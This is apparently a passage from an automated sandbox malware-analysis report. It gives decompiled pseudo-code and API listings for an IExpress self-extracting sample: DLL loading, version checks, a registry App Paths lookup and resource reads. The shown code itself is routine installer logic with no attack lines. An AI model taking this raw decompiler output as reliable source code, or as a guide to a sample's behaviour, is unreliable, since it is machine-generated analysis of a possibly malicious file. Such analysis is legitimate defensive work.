                                                                                                                                                                                                    0x00fd39fc
                                                                                                                                                                                                    0x00fd39d3
                                                                                                                                                                                                    0x00fd39d8
                                                                                                                                                                                                    0x00fd39da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd39dc
                                                                                                                                                                                                    0x00fd39b6
                                                                                                                                                                                                    0x00fd3955
                                                                                                                                                                                                    0x00fd395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3961
                                                                                                                                                                                                    0x00fd3963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3969
                                                                                                                                                                                                    0x00fd3969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3969
                                                                                                                                                                                                    0x00fd3915
                                                                                                                                                                                                    0x00fd3915
                                                                                                                                                                                                    0x00fd391b
                                                                                                                                                                                                    0x00fd391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd392d
                                                                                                                                                                                                    0x00fd3933
                                                                                                                                                                                                    0x00fd3938
                                                                                                                                                                                                    0x00fd393a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3940
                                                                                                                                                                                                    0x00fd3946
                                                                                                                                                                                                    0x00fd394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38f2
                                                                                                                                                                                                    0x00fd3843
                                                                                                                                                                                                    0x00fd3845
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd384b
                                                                                                                                                                                                    0x00fd384d
                                                                                                                                                                                                    0x00fd3883
                                                                                                                                                                                                    0x00fd3885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd389a
                                                                                                                                                                                                    0x00fd389e
                                                                                                                                                                                                    0x00fd389e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38a0
                                                                                                                                                                                                    0x00fd38a0
                                                                                                                                                                                                    0x00fd38a2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38a4
                                                                                                                                                                                                    0x00fd384f
                                                                                                                                                                                                    0x00fd3851
                                                                                                                                                                                                    0x00fd3857
                                                                                                                                                                                                    0x00fd386e
                                                                                                                                                                                                    0x00fd3877
                                                                                                                                                                                                    0x00fd387b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3881
                                                                                                                                                                                                    0x00fd3859
                                                                                                                                                                                                    0x00fd385c
                                                                                                                                                                                                    0x00fd3862
                                                                                                                                                                                                    0x00fd3866
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd38f4
                                                                                                                                                                                                    0x00fd38f4
                                                                                                                                                                                                    0x00fd38f5
                                                                                                                                                                                                    0x00fd38fb
                                                                                                                                                                                                    0x00fd3901
                                                                                                                                                                                                    0x00fd3901
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd390a
                                                                                                                                                                                                    0x00fd374b
                                                                                                                                                                                                    0x00fd374e
                                                                                                                                                                                                    0x00fd375c
                                                                                                                                                                                                    0x00fd3764
                                                                                                                                                                                                    0x00fd3769
                                                                                                                                                                                                    0x00fd376e
                                                                                                                                                                                                    0x00fd3771
                                                                                                                                                                                                    0x00fd379c
                                                                                                                                                                                                    0x00fd379f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd37a3
                                                                                                                                                                                                    0x00fd37a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd37a4
                                                                                                                                                                                                    0x00fd3773
                                                                                                                                                                                                    0x00fd3777
                                                                                                                                                                                                    0x00fd3778
                                                                                                                                                                                                    0x00fd377f
                                                                                                                                                                                                    0x00fd3781
                                                                                                                                                                                                    0x00fd378e
                                                                                                                                                                                                    0x00fd378e
                                                                                                                                                                                                    0x00fd3794
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3794
                                                                                                                                                                                                    0x00fd3783
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3785
                                                                                                                                                                                                    0x00fd378c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd378c
                                                                                                                                                                                                    0x00fd3750
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd372d
                                                                                                                                                                                                    0x00fd372d
                                                                                                                                                                                                    0x00fd396b
                                                                                                                                                                                                    0x00fd396b
                                                                                                                                                                                                    0x00fd396c
                                                                                                                                                                                                    0x00fd396e
                                                                                                                                                                                                    0x00fd396f
                                                                                                                                                                                                    0x00fd3a1e
                                                                                                                                                                                                    0x00fd3a1e
                                                                                                                                                                                                    0x00fd3a22
                                                                                                                                                                                                    0x00fd3a27
                                                                                                                                                                                                    0x00fd3a3e
                                                                                                                                                                                                    0x00fd3a3e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00FD3723
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FD39C3
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 00FD39F1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                    • String ID: 3$nst0dum
                                                                                                                                                                                                    • API String ID: 2519184315-140149190
                                                                                                                                                                                                    • Opcode ID: e860a7d59e056a26eeccc76ff90f1a8b89671db5a0febd97f56a09fddbed77ae
                                                                                                                                                                                                    • Instruction ID: c7fe69a0aff116851882d5a00cf17cddd8532a213448e99f91fbf291429e5181
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e860a7d59e056a26eeccc76ff90f1a8b89671db5a0febd97f56a09fddbed77ae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B091D172F062249BDB658B24CC90BAA77B3AB45310F1D00ABDA49A7351D7758E81FB43
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E00FD6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed char _t14;
                                                                                                                                                                                                    				struct HINSTANCE__* _t15;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				CHAR* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				E00FD1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                    				_t26 = "advpack.dll";
                                                                                                                                                                                                    				E00FD658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                    				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                    					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x00fd6495
                                                                                                                                                                                                    0x00fd6495
                                                                                                                                                                                                    0x00fd64a0
                                                                                                                                                                                                    0x00fd64a7
                                                                                                                                                                                                    0x00fd64ab
                                                                                                                                                                                                    0x00fd64bd
                                                                                                                                                                                                    0x00fd64c2
                                                                                                                                                                                                    0x00fd64d3
                                                                                                                                                                                                    0x00fd64df
                                                                                                                                                                                                    0x00fd64e8
                                                                                                                                                                                                    0x00fd6502
                                                                                                                                                                                                    0x00fd64ee
                                                                                                                                                                                                    0x00fd64f9
                                                                                                                                                                                                    0x00fd64f9
                                                                                                                                                                                                    0x00fd6516

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00FD64DF
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00FD64F9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00FD6502
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                    • API String ID: 438848745-3856989675
                                                                                                                                                                                                    • Opcode ID: e09550039c8d93b15d4855112899f6a5f301f17d19ef5106220d6840d107fae6
                                                                                                                                                                                                    • Instruction ID: e886e4802ac3008eb336e0ad1201ba9c4e45b43d7f086904da410250c8263f2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e09550039c8d93b15d4855112899f6a5f301f17d19ef5106220d6840d107fae6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A012130A00108ABDB10DB70EC49FEA733AEB50310F480197F485D22C0DFB09ECABA11
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                    				long _t68;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                    				_t106 = 0;
                                                                                                                                                                                                    				_v16 = __ecx;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t103 = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_t106 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t62 = 0;
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                    						if(E00FD2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                    										do {
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00FD2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00FD2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x00fd28f1
                                                                                                                                                                                                    0x00fd28f4
                                                                                                                                                                                                    0x00fd28f7
                                                                                                                                                                                                    0x00fd28f9
                                                                                                                                                                                                    0x00fd28fc
                                                                                                                                                                                                    0x00fd28ff
                                                                                                                                                                                                    0x00fd2901
                                                                                                                                                                                                    0x00fd2907
                                                                                                                                                                                                    0x00fd2a62
                                                                                                                                                                                                    0x00fd2a64
                                                                                                                                                                                                    0x00fd290d
                                                                                                                                                                                                    0x00fd290d
                                                                                                                                                                                                    0x00fd290f
                                                                                                                                                                                                    0x00fd2912
                                                                                                                                                                                                    0x00fd2920
                                                                                                                                                                                                    0x00fd2937
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2944
                                                                                                                                                                                                    0x00fd294a
                                                                                                                                                                                                    0x00fd294f
                                                                                                                                                                                                    0x00fd2a2f
                                                                                                                                                                                                    0x00fd2a32
                                                                                                                                                                                                    0x00fd2a34
                                                                                                                                                                                                    0x00fd2a37
                                                                                                                                                                                                    0x00fd2a41
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2955
                                                                                                                                                                                                    0x00fd295e
                                                                                                                                                                                                    0x00fd2962
                                                                                                                                                                                                    0x00fd2969
                                                                                                                                                                                                    0x00fd296f
                                                                                                                                                                                                    0x00fd2974
                                                                                                                                                                                                    0x00fd298c
                                                                                                                                                                                                    0x00fd2a20
                                                                                                                                                                                                    0x00fd2a21
                                                                                                                                                                                                    0x00fd2a27
                                                                                                                                                                                                    0x00fd2a4c
                                                                                                                                                                                                    0x00fd2a4f
                                                                                                                                                                                                    0x00fd2a50
                                                                                                                                                                                                    0x00fd2a53
                                                                                                                                                                                                    0x00fd2a56
                                                                                                                                                                                                    0x00fd2a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd29b2
                                                                                                                                                                                                    0x00fd29b2
                                                                                                                                                                                                    0x00fd29b5
                                                                                                                                                                                                    0x00fd29bd
                                                                                                                                                                                                    0x00fd29c3
                                                                                                                                                                                                    0x00fd29cc
                                                                                                                                                                                                    0x00fd29d5
                                                                                                                                                                                                    0x00fd29d7
                                                                                                                                                                                                    0x00fd29da
                                                                                                                                                                                                    0x00fd29dd
                                                                                                                                                                                                    0x00fd29df
                                                                                                                                                                                                    0x00fd29ec
                                                                                                                                                                                                    0x00fd29f8
                                                                                                                                                                                                    0x00fd29fc
                                                                                                                                                                                                    0x00fd29ff
                                                                                                                                                                                                    0x00fd2a02
                                                                                                                                                                                                    0x00fd2a07
                                                                                                                                                                                                    0x00fd2a0a
                                                                                                                                                                                                    0x00fd2a0f
                                                                                                                                                                                                    0x00fd2a19
                                                                                                                                                                                                    0x00fd2a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2a0f
                                                                                                                                                                                                    0x00fd298c
                                                                                                                                                                                                    0x00fd2974
                                                                                                                                                                                                    0x00fd2962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd294f
                                                                                                                                                                                                    0x00fd2912
                                                                                                                                                                                                    0x00fd2a65
                                                                                                                                                                                                    0x00fd2a68
                                                                                                                                                                                                    0x00fd2a6c
                                                                                                                                                                                                    0x00fd2a6f
                                                                                                                                                                                                    0x00fd2a6f
                                                                                                                                                                                                    0x00fd2a7d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00FD2A6F
                                                                                                                                                                                                      • Part of subcall function 00FD2773: CharUpperA.USER32(42DE454F,00000000,00000000,00000000), ref: 00FD27A8
                                                                                                                                                                                                      • Part of subcall function 00FD2773: CharNextA.USER32(0000054D), ref: 00FD27B5
                                                                                                                                                                                                      • Part of subcall function 00FD2773: CharNextA.USER32(00000000), ref: 00FD27BC
                                                                                                                                                                                                      • Part of subcall function 00FD2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2829
                                                                                                                                                                                                      • Part of subcall function 00FD2773: RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2852
                                                                                                                                                                                                      • Part of subcall function 00FD2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2870
                                                                                                                                                                                                      • Part of subcall function 00FD2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD28A0
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00FD3938,?,?,?,?,-00000005), ref: 00FD2958
                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00FD2969
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FD3938,?,?,?,?,-00000005,?), ref: 00FD2A21
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00FD2A81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                    • Opcode ID: 624214039f022e9c9a5b889981bfae53d27d15af55aa8533f75542774202d6df
                                                                                                                                                                                                    • Instruction ID: 149fe2a4584d7ba5c338575a9292e29baaca620511cd69e7d21724151e44b8fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 624214039f022e9c9a5b889981bfae53d27d15af55aa8533f75542774202d6df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11512A31D00219DBCB61DFA8C884AAEFBB6FF58711F18406BE905E3311DB359941EB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                    			E00FD4169(void* __eflags) {
                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = E00FD468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                    				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					if(E00FD468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							return LocalFree(_t21);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(0x40);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t21);
                                                                                                                                                                                                    						_t18 = 0x3e9;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						E00FD44B9(0, _t18);
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00fd417d
                                                                                                                                                                                                    0x00fd418f
                                                                                                                                                                                                    0x00fd4193
                                                                                                                                                                                                    0x00fd41b7
                                                                                                                                                                                                    0x00fd41d3
                                                                                                                                                                                                    0x00fd41e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd41e7
                                                                                                                                                                                                    0x00fd41d5
                                                                                                                                                                                                    0x00fd41d6
                                                                                                                                                                                                    0x00fd41d8
                                                                                                                                                                                                    0x00fd41d9
                                                                                                                                                                                                    0x00fd41da
                                                                                                                                                                                                    0x00fd41df
                                                                                                                                                                                                    0x00fd41e1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd41e1
                                                                                                                                                                                                    0x00fd41b9
                                                                                                                                                                                                    0x00fd41ba
                                                                                                                                                                                                    0x00fd41bc
                                                                                                                                                                                                    0x00fd41bd
                                                                                                                                                                                                    0x00fd41be
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd41be
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
